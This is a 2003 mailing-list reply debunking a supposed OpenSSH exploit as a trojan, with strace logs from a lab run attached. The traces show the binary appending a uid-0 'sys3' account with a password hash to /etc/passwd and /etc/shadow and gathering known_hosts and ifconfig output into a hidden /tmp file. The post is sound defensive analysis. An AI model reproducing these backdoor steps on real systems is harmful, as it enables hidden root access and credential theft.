Message-ID: <1063949231.2373.20.camel@localhost>
From: chris at neitzert.com (christopher neitzert)
Subject: Re: new openssh exploit in the wild! * is
	FAKE AS SH@!*
Lars,
What you say is true.
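For those of you who are interested, attached is an strace of this bogus
exploit, which I ran in my lab on disposable systems in a captive network.
The trace shows the binary, run as root, sending only the string "gdfea#"
and a few filler bytes to the remote sshd, while a local /bin/sh child
appends a uid-0 "sys3" account to /etc/passwd and /etc/shadow and collects
ifconfig output, passwd, shadow and known_hosts into /tmp/.tmp.
Note: in the parent PID file I edited out quite a bit of repetitive
bogus wait statements; no sense in filling your mailboxes with 400k
lines of crap.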
...
Chris
On Fri, 2003-09-19 at 03:07, Lars Olsson wrote:
> On Fri, 19 Sep 2003, Vitaly Osipov wrote:
> 
> > This means that the original poster (gordon last) made it up himself, because he is saying :
> >
> > >> > i looked at this piece of exploit... it is binary so i'am not sure if
> > >> > this is a trojan or a backdoor or a virus. but i can't see anything
> > >> > strange while sniffing the exploit traffic. and i got root on serveral
> > >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> >
> > which is obviously not true. Btw, as far as I understand, the trojan code is triggered when
> > the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.
> >
> 
> The trojan seems to be triggered in both cases, provided that the
> "bruteforcing" terminates. I haven't test-run the code, but I did a very
> quick reverse of the binary. It connects to the remote sshd but only
> sends the key used for descrambling the trojan code while it pretends
> to search for offsets.
> 
> 
> /Lars
-- 
Christopher Neitzert http://www.neitzert.com/~chris
-------------- next part --------------
execve("./theosshucksass", ["./theosshucksass", "192.168.0.34"], [/* 20 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x804a450
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x804a450
brk(0x804b450)                          = 0x804b450
brk(0)                                  = 0x804b450
brk(0x804c000)                          = 0x804c000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0
ioctl(1, SNDCTL_TMR_TIMEBASE, {B38400 opost isig icanon echo ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
write(1, "theosshucksass.c - remote openss"..., 59) = 59
write(1, "by raazab/m0nkeyhack@...ermarkt."..., 35) = 35
getuid32()                              = 0
write(1, "\nr00ting box...\n", 16)      = 16
write(1, "\thost: 192.168.0.34\n", 20)  = 20
write(1, "\toffset: (null)\n\n", 17)    = 17
write(1, "[*] building socket\n", 20)   = 20
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1)                       = 1
write(1, "[*] no offset given: brute force"..., 63) = 63
write(1, "\tTrying 0xe56ac71c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac720\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac724\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac728\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac72c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac730\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac734\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac738\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-/\n", 4)                    = 4
write(1, "\tTrying 0xe56ac73c\t", 19)   = 19
write(3, "gdfea#\0", 7)                 = 7
write(1, ":-)\n", 4)                    = 4
write(1, "[*] Gotcha!\n", 12)           = 12
write(1, "[*] reconnecting \n", 18)     = 18
close(3)                                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1)                       = 1
write(1, "[*] calculating nops\n", 21)  = 21
write(1, "[*] sending nops\n", 17)      = 17
write(3, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 23) = 23
write(1, "[*] sending shellcode\n", 22) = 22
pipe([4, 5])                            = 0
vfork()                                 = 1062
close(5) = 0
write(3, "\210", 1)                                = 1
write(1, "[*] trying to spawn remote shell"..., 47)                              = 47
write(3, "gdfea#", 6)                                = 6
write(1, "[*] closing socket\n\n", 20) = 20
close(3)                                = 0
write(1, "all seems fine... try to connect"..., 63) = 63
munmap(0x40017000, 4096) = 0
exit_group(0)                           = ?
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
execve("/bin/sh", ["sh", "-c", "(echo \"sys3:x:0:103::/:/bin/sh\" "...], [/* 20 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0)                = 0x80e5b54
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/libtermcap.so.2", O_RDONLY)  = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0
old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001f000
old_mmap(0x40022000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40022000
close(4)                                = 0
open("/lib/libdl.so.2", O_RDONLY)       = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=15900, ...}) = 0
old_mmap(NULL, 13176, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40023000
old_mmap(0x40026000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40026000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000
set_thread_area({entry_number:-1 -> 6, base_addr:0x40027660, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = 4
close(4)                                = 0
brk(0)                                  = 0x80e5b54
brk(0)                                  = 0x80e5b54
brk(0x80e6000)                          = 0x80e6000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40028000
close(4)                                = 0
brk(0)                                  = 0x80e6000
brk(0x80e7000)                          = 0x80e7000
brk(0)                                  = 0x80e7000
brk(0x80e8000)                          = 0x80e8000
getuid32()                              = 0
getgid32()                              = 0
geteuid32()                             = 0
getegid32()                             = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0)                                  = 0x80e8000
brk(0x80e9000)                          = 0x80e9000
time(NULL)                              = 1063931038
brk(0)                                  = 0x80e9000
brk(0x80ea000)                          = 0x80ea000
open("/etc/mtab", O_RDONLY)             = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=264, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "/dev/hdb2 / ext3 rw 0 0\nnone /pr"..., 4096) = 264
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
open("/proc/meminfo", O_RDONLY)         = 4
fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(4, "        total:    used:    free:"..., 1024) = 653
close(4)                                = 0
munmap(0x40017000, 4096)                = 0
brk(0)                                  = 0x80ea000
brk(0x80eb000)                          = 0x80eb000
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
uname({sys="Linux", node="f00f", ...})  = 0
stat64("/root/theothisisourpresentforyou", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
getpid()                                = 1062
getppid()                               = 1
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/sbin/sh", 0xbffff1b0)          = -1 ENOENT (No such file or directory)
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK)                 = 0
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK)                 = 0
getpgrp()                               = 1060
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0)                                  = 0x80eb000
brk(0x80ec000)                          = 0x80ec000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 4, 0) = 0x40017000
close(4)                                = 0
brk(0)                                  = 0x80ec000
brk(0x80ed000)                          = 0x80ed000
brk(0)                                  = 0x80ed000
brk(0x80ee000)                          = 0x80ee000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
wait4(-1, 
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid()                                = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
dup2(1, 2)                              = 2
open("/etc/passwd", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD)                     = 0
fcntl64(1, F_DUPFD, 10)                 = 10
fcntl64(1, F_GETFD)                     = 0
fcntl64(10, F_SETFD, FD_CLOEXEC)        = 0
dup2(4, 1)                              = 1
close(4)                                = 0
write(1, "sys3:x:0:103::/:/bin/sh\n", 24) = 24
dup2(10, 1)                             = 1
fcntl64(10, F_GETFD)                    = 0x1 (flags FD_CLOEXEC)
close(10)                               = 0
open("/etc/shadow", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD)                     = 0
fcntl64(1, F_DUPFD, 10)                 = 10
fcntl64(1, F_GETFD)                     = 0
fcntl64(10, F_SETFD, FD_CLOEXEC)        = 0
dup2(4, 1)                              = 1
close(4)                                = 0
write(1, "sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HK"..., 59) = 59
dup2(10, 1)                             = 1
fcntl64(10, F_GETFD)                    = 0x1 (flags FD_CLOEXEC)
close(10)                               = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffec34, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/root/", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 4
fstat64(4, {st_mode=S_IFDIR|0750, st_size=4096, ...}) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC)         = 0
brk(0)                                  = 0x80ee000
brk(0x80f0000)                          = 0x80f0000
getdents64(4, /* 30 entries */, 4096)   = 1008
getdents64(4, /* 0 entries */, 4096)    = 0
close(4)                                = 0
stat64("/root/.ssh", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
lstat64("/root/.ssh/known_hosts", {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/sbin/cat", 0xbfffeec0)         = -1 ENOENT (No such file or directory)
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK)                = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK)                = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8)                           = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffecd4, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/sbin/find", 0xbfffef60)        = -1 ENOENT (No such file or directory)
stat64("/bin/find", 0xbfffef60)         = -1 ENOENT (No such file or directory)
stat64("/usr/sbin/find", 0xbfffef60)    = -1 ENOENT (No such file or directory)
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK)           = 0
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK)           = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8)                           = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 1], 0, NULL) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffed74, WNOHANG, NULL)    = -1 ECHILD (No child processes)
sigreturn()                             = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
pipe([4, 5])                            = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1067
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(5)                                = 0
close(5)       = -1 EBADF (Bad file descriptor)
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1068
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(4)                                = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8)                     = 0
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8)                         = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8)           = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, 
-------------- next part --------------
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid()                                = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1)                              = 1
close(4)                                = 0
execve("/sbin/ifconfig", ["/sbin/ifconfig", "-a"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...})  = 0
brk(0)                                  = 0x8055fe8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0x40017000, 31716)               = 0
brk(0)                                  = 0x8055fe8
brk(0x8056fe8)                          = 0x8056fe8
brk(0)                                  = 0x8056fe8
brk(0x8057000)                          = 0x8057000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4)                                = 0
uname({sys="Linux", node="f00f", ...})  = 0
access("/proc/net", R_OK)               = 0
access("/proc/net/unix", R_OK)          = 0
socket(PF_UNIX, SOCK_DGRAM, 0)          = 4
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
access("/proc/net/if_inet6", R_OK)      = -1 ENOENT (No such file or directory)
access("/proc/net/ax25", R_OK)          = -1 ENOENT (No such file or directory)
access("/proc/net/nr", R_OK)            = -1 ENOENT (No such file or directory)
access("/proc/net/rose", R_OK)          = -1 ENOENT (No such file or directory)
access("/proc/net/ipx", R_OK)           = -1 ENOENT (No such file or directory)
access("/proc/net/appletalk", R_OK)     = -1 ENOENT (No such file or directory)
access("/proc/sys/net/econet", R_OK)    = -1 ENOENT (No such file or directory)
access("/proc/sys/net/ash", R_OK)       = -1 ENOENT (No such file or directory)
access("/proc/net/x25", R_OK)           = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(6, "Inter-|   Receive               "..., 1024) = 569
read(6, "", 1024)                       = 0
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/locale.alias", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(6, "# Locale name alias data base.\n#"..., 4096) = 2601
brk(0)                                  = 0x8057000
brk(0x8058000)                          = 0x8058000
read(6, "", 4096)                       = 0
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
ioctl(5, 0x8912, 0xbffff240)            = 0
open("/proc/net/dev", O_RDONLY)         = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000
read(6, "Inter-|   Receive               "..., 1024) = 569
close(6)                                = 0
munmap(0x40017000, 4096)                = 0
ioctl(5, 0x8913, 0xbffff1e0)            = 0
ioctl(5, 0x8927, 0xbffff1e0)            = 0
ioctl(5, 0x891d, 0xbffff1e0)            = 0
